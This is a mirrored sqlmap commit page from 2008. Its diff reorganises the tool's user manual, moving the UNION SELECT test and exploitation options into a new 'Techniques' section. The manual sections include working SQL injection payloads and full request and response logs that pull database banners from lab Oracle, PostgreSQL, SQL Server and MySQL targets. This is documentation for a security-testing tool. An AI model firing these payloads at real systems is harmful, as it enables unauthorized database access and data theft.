sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 09:36:35 +03:00
Code Issues Packages Projects Releases Wiki Activity

Major bug fix to correctly handle httplib.BadStatusLine exception.

Browse Source 
Minor improvement to set by default in all HTTP requests the standard HTTP headers (Accept, Accept-Encoding, etc.)
Updated user's manual.
This commit is contained in:
Bernardo Damele 2008-11-15 12:25:19 +00:00
parent 4bf1fcb8ec
commit 84cbc60659
5 changed files with 399 additions and 313 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

359
doc/README.html
View File

@ -38,12 +38,13 @@ for the latest version.</EM>
<UL>
<LI><A NAME="toc5.1">5.1</A> <A HREF="README.html#ss5.1">Request</A>
<LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Injection</A>
<LI><A NAME="toc5.3">5.3</A> <A HREF="README.html#ss5.3">Fingerprint</A>
<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Enumeration</A>
<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">File system access</A>
<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">Operating system access</A>
<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">Miscellaneous</A>
<LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Techniques</A>
<LI><A NAME="toc5.3">5.3</A> <A HREF="README.html#ss5.3">Injection</A>
<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Fingerprint</A>
<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">Enumeration</A>
<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">File system access</A>
<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">Operating system access</A>
<LI><A NAME="toc5.8">5.8</A> <A HREF="README.html#ss5.8">Miscellaneous</A>
</UL>
<P>
<H2><A NAME="toc6">6.</A> <A HREF="README.html#s6">Disclaimer</A></H2>
@ -360,11 +361,22 @@ Options:
--auth-cred=ACRED HTTP Authentication credentials, value: name:password
--proxy=PROXY Use a HTTP proxy to connect to the target url
--threads=THREADS Maximum number of concurrent HTTP requests (default 1)
--delay=DELAY Delay in seconds between each HTTP request
Injection:
--string=STRING String to match in page when the query is valid
--dbms=DBMS Force back-end DBMS to this value
Techniques:
These options can be used to test for specific SQL injection technique
or to use one of them to exploit the affected parameter(s) rather than
using the default blind SQL injection technique.
--time-test Test for Time based blind SQL injection
--union-test Test for UNION SELECT (inband) SQL injection
--union-use Use the UNION SELECT (inband) SQL injection to
retrieve the queries output. No need to go blind
Fingerprint:
-f, --fingerprint Perform an extensive database fingerprint
@ -381,9 +393,9 @@ Options:
--privileges Enumerate DBMS users privileges (opt: -U)
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables (opt: -D)
--columns Enumerate DBMS database table columns (req: -T, -D)
--dump Dump DBMS database table entries (req: -T, -D opt: -C,
--start, --stop)
--columns Enumerate DBMS database table columns (req:-T opt:-D)
--dump Dump DBMS database table entries (req: -T, opt: -D,
-C, --start, --stop)
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
@ -413,9 +425,6 @@ Options:
server document root for the moment)
Miscellaneous:
--union-test Test for UNION SELECT (inband) SQL injection
--union-use Use the UNION SELECT (inband) SQL injection to
retrieve the queries output. No need to go blind
--eta Retrieve each query output length and calculate the
estimated time of arrival in real time
-v VERBOSE Verbosity level: 0-5 (default 0)
@ -1031,9 +1040,23 @@ Connection: close
</P>
<P>Note that the HTTP <CODE>User-Agent</CODE> header is tested against SQL
injection even if you do not overwrite the default sqlmap HTTP
injection also if you do not overwrite the default sqlmap HTTP
<CODE>User-Agent</CODE> header value.</P>
<P>Some sites perform a server-side check on the HTTP <CODE>User-Agent</CODE>
header value and fail the HTTP response if a valid <CODE>User-Agent</CODE> is
not provided, its value is not expected or its value is blocked by a web
application firewall or similar intrusion prevention system. In this case
sqlmap will show you a message as follows:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try
to force the HTTP User-Agent header with option --user-agent or -a
</PRE>
</CODE></BLOCKQUOTE>
</P>
<H3>HTTP <CODE>Basic</CODE> and <CODE>Digest</CODE> authentications</H3>
@ -1172,7 +1195,161 @@ seven HTTP requests, the maximum to retrieve a query output character.</P>
request. The valid value is a float, for instance 0.5.</P>
<H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Injection</A>
<H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Techniques</A>
</H2>
<H3>Test for Time Based Blind SQL injection</H3>
<P>Option: <CODE>--time-test</CODE></P>
<P>TODO</P>
<H3>Test for UNION SELECT query SQL injection</H3>
<P>Option: <CODE>--union-test</CODE></P>
<P>It is possible to test if the target URL is affected by an <B>inband
SQL injection</B> vulnerability.
Refer to the <EM>Techniques</EM> section for details on this SQL injection
technique.</P>
<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the target URL parameter <CODE>id</CODE> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.</P>
<H3>Use the UNION SELECT query SQL injection</H3>
<P>Option: <CODE>--union-use</CODE></P>
<P>Providing the <CODE>--union-use</CODE> parameter, sqlmap will first test if
the target URL is affected by an <B>inband SQL injection</B>
(<CODE>--union-test</CODE>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <CODE>SELECT</CODE> queries.</P>
<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the vulnerable parameter (<CODE>id</CODE>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.</P>
<H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Injection</A>
</H2>
<H3>String match</H3>
@ -1369,7 +1546,7 @@ back-end database management system. If you do not know it, let sqlmap
automatically identify it for you.</P>
<H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Fingerprint</A>
<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Fingerprint</A>
</H2>
<H3>Extensive database management system fingerprint</H3>
@ -1584,7 +1761,7 @@ parsing library that fetches data from Chip Andrews'
<A HREF="http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx">SQLSecurity.com site</A> and outputs it to the XML versions file.</P>
<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Enumeration</A>
<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Enumeration</A>
</H2>
<H3>Banner</H3>
@ -2664,7 +2841,7 @@ column names of the table then asks if the query can return multiple
entries and goes on.</P>
<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">File system access</A>
<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">File system access</A>
</H2>
<H3>Read a specific file content</H3>
@ -2708,7 +2885,7 @@ inquis:x:1000:100:Bernardo Damele A. G.,,,:/home/inquis:/bin/bash
</P>
<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">Operating system access</A>
<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">Operating system access</A>
</H2>
<H3>Prompt for an interactive operating system shell</H3>
@ -2746,153 +2923,9 @@ $ exit
functionalities of SQL shell.</P>
<H2><A NAME="ss5.7">5.7</A> <A HREF="#toc5.7">Miscellaneous</A>
<H2><A NAME="ss5.8">5.8</A> <A HREF="#toc5.8">Miscellaneous</A>
</H2>
<H3>Test for UNION SELECT query SQL injection</H3>
<P>Option: <CODE>--union-test</CODE></P>
<P>It is possible to test if the target URL is affected by an <B>inband
SQL injection</B> vulnerability.
Refer to the <EM>Techniques</EM> section for details on this SQL injection
technique.</P>
<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the target URL parameter <CODE>id</CODE> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.</P>
<H3>Use the UNION SELECT query SQL injection</H3>
<P>Option: <CODE>--union-use</CODE></P>
<P>Providing the <CODE>--union-use</CODE> parameter, sqlmap will first test if
the target URL is affected by an <B>inband SQL injection</B>
(<CODE>--union-test</CODE>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <CODE>SELECT</CODE> queries.</P>
<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the vulnerable parameter (<CODE>id</CODE>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.</P>
<H3>Estimated time of arrival</H3>
<P>Option: <CODE>--eta</CODE></P>

BIN
doc/README.pdf
View File

Binary file not shown.

331
doc/README.sgml
View File

@ -323,11 +323,22 @@ Options:
--auth-cred=ACRED HTTP Authentication credentials, value: name:password
--proxy=PROXY Use a HTTP proxy to connect to the target url
--threads=THREADS Maximum number of concurrent HTTP requests (default 1)
--delay=DELAY Delay in seconds between each HTTP request
Injection:
--string=STRING String to match in page when the query is valid
--dbms=DBMS Force back-end DBMS to this value
Techniques:
These options can be used to test for specific SQL injection technique
or to use one of them to exploit the affected parameter(s) rather than
using the default blind SQL injection technique.
--time-test Test for Time based blind SQL injection
--union-test Test for UNION SELECT (inband) SQL injection
--union-use Use the UNION SELECT (inband) SQL injection to
retrieve the queries output. No need to go blind
Fingerprint:
-f, --fingerprint Perform an extensive database fingerprint
@ -344,9 +355,9 @@ Options:
--privileges Enumerate DBMS users privileges (opt: -U)
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables (opt: -D)
--columns Enumerate DBMS database table columns (req: -T, -D)
--dump Dump DBMS database table entries (req: -T, -D opt: -C,
--start, --stop)
--columns Enumerate DBMS database table columns (req:-T opt:-D)
--dump Dump DBMS database table entries (req: -T, opt: -D,
-C, --start, --stop)
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
@ -376,9 +387,6 @@ Options:
server document root for the moment)
Miscellaneous:
--union-test Test for UNION SELECT (inband) SQL injection
--union-use Use the UNION SELECT (inband) SQL injection to
retrieve the queries output. No need to go blind
--eta Retrieve each query output length and calculate the
estimated time of arrival in real time
-v VERBOSE Verbosity level: 0-5 (default 0)
@ -977,9 +985,21 @@ Connection: close
<p>
Note that the HTTP <tt>User-Agent</tt> header is tested against SQL
injection even if you do not overwrite the default sqlmap HTTP
injection also if you do not overwrite the default sqlmap HTTP
<tt>User-Agent</tt> header value.
<p>
Some sites perform a server-side check on the HTTP <tt>User-Agent</tt>
header value and fail the HTTP response if a valid <tt>User-Agent</tt> is
not provided, its value is not expected or its value is blocked by a web
application firewall or similar intrusion prevention system. In this case
sqlmap will show you a message as follows:
<tscreen><verb>
[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try
to force the HTTP User-Agent header with option --user-agent or -a
</verb></tscreen>
<sect2>HTTP <tt>Basic</tt> and <tt>Digest</tt> authentications
@ -1118,6 +1138,160 @@ It is possible to specify a number of seconds to wait between each HTTP
request. The valid value is a float, for instance 0.5.
<sect1>Techniques
<sect2>Test for Time Based Blind SQL injection
<p>
Option: <tt>--time-test</tt>
<p>
TODO
<sect2>Test for UNION SELECT query SQL injection
<p>
Option: <tt>--union-test</tt>
<p>
It is possible to test if the target URL is affected by an <bf>inband
SQL injection</bf> vulnerability.
Refer to the <em>Techniques</em> section for details on this SQL injection
technique.
<p>
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</verb></tscreen>
<p>
Example on a <bf>PostgreSQL 8.2.7</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</verb></tscreen>
<p>
As you can see, the target URL parameter <tt>id</tt> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.
<sect2>Use the UNION SELECT query SQL injection
<p>
Option: <tt>--union-use</tt>
<p>
Providing the <tt>--union-use</tt> parameter, sqlmap will first test if
the target URL is affected by an <bf>inband SQL injection</bf>
(<tt>--union-test</tt>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <tt>SELECT</tt> queries.
<p>
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
</verb></tscreen>
<p>
As you can see, the vulnerable parameter (<tt>id</tt>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.
<p>
Example on a <bf>MySQL 5.0.51</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
</verb></tscreen>
<p>
As you can see, the MySQL <tt>version()</tt> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.
<sect1>Injection
<sect2>String match
@ -2671,149 +2845,6 @@ functionalities of SQL shell.
<sect1>Miscellaneous
<sect2>Test for UNION SELECT query SQL injection
<p>
Option: <tt>--union-test</tt>
<p>
It is possible to test if the target URL is affected by an <bf>inband
SQL injection</bf> vulnerability.
Refer to the <em>Techniques</em> section for details on this SQL injection
technique.
<p>
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</verb></tscreen>
<p>
Example on a <bf>PostgreSQL 8.2.7</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</verb></tscreen>
<p>
As you can see, the target URL parameter <tt>id</tt> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.
<sect2>Use the UNION SELECT query SQL injection
<p>
Option: <tt>--union-use</tt>
<p>
Providing the <tt>--union-use</tt> parameter, sqlmap will first test if
the target URL is affected by an <bf>inband SQL injection</bf>
(<tt>--union-test</tt>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <tt>SELECT</tt> queries.
<p>
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
